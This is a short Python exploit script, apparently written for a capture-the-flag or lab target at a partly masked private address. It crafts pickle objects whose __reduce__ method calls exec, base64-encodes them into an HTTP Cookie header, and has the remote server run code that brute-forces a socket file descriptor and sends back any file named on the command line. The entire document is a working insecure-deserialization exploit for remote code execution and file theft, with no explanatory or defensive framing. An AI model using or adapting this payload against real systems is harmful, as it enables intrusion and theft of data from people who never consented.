#!/usr/bin/env python3
import pickle, os, sys, base64, builtins, socket

if len(sys.argv) != 2:
    print('usage: {0} <file>'.format(sys.argv[0]))
    sys.exit(1)

for fd in range(4,50):
    code = "import socket;s=socket.fromfd(" + str(fd) + ", socket.AF_INET, socket.SOCK_STREAM);s.send(open('" + sys.argv[1] + "','rb').read())"

    class P(object):
        def __reduce__(self):
            return (builtins.exec,(code,))
    
    payload = base64.b64encode(pickle.dumps(P()))
    
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('10.XX.32.142', 80))
    s.send(b'GET / HTTP/1.0\r\nCookie: user=' + payload + b'\r\n\r\n')
    c = s.recv(4096)
    s.close()
    if c.startswith(b'HTTP/1.0 200 OK'):
        continue
    print('[fd found={0}]'.format(fd))
    sys.stdout.buffer.write(c)
    sys.stdout.flush()
    sys.exit(0)